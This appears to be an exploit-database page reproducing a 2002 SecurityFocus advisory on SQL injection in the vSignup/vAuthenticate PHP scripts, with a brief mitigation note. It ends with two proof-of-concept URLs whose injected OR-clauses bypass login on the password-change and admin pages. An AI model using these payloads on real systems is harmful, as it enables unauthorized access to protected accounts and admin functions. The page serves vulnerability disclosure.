header-logo
Suggest Exploit
vendor:
vSignup
by:
SecurityFocus
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: vSignup
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

SQL Injection in vSignup

A vulnerability has been discovered in vSignup. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages. An attacker that is able to access protected web pages may gain sensitive information that may aid in launching further attacks against a target server.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/6606/info

A vulnerability has been discovered in vSignup. It has been reported that various PHP scripts used by vAuthenticate are prone to SQL injection attacks. This issue may be exploited by an unauthorized attacker to view protected web pages.

An attacker that is able to access protected web pages may gain sensitive information that may aid in launching further attacks against a target server.

http://www.example.org/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
http://www.example.org/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1

Navigation

Suggest Exploit

Services By CQR